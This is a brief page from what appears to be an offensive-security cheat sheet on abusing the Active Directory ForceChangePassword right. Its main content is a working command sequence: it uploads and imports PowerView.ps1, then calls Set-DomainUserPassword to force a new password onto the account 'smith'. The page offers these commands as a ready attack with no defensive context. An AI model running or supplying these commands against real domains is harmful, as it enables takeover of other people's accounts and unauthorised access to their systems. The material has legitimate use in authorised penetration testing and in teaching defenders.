For the complete documentation index, see llms.txt. This page is also available as Markdown.

ForceChangePassword

You can change user passwords with this

upload /opt/PowerView.ps1
Import-Module .\PowerView.ps1
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity smith -AccountPassword $UserPassword

Last updated